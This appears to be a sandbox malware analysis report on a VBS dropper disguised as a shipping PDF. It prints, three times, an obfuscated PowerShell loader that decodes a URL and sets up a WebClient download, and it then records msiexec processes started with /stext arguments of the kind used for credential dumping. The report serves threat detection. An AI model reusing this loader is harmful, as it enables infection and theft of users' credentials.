              Source: msiexec.exe, 00000008.00000002.3028615098.00000000200B0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: msiexec.exe, 0000000A.00000003.2193037694.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2194835668.00000000008EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_12-32919
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MV STARSHIP AQUILA_pdf.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvje
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvje
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bbodmcpjtkxucbcyfoug"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvjeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bbodmcpjtkxucbcyfoug"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
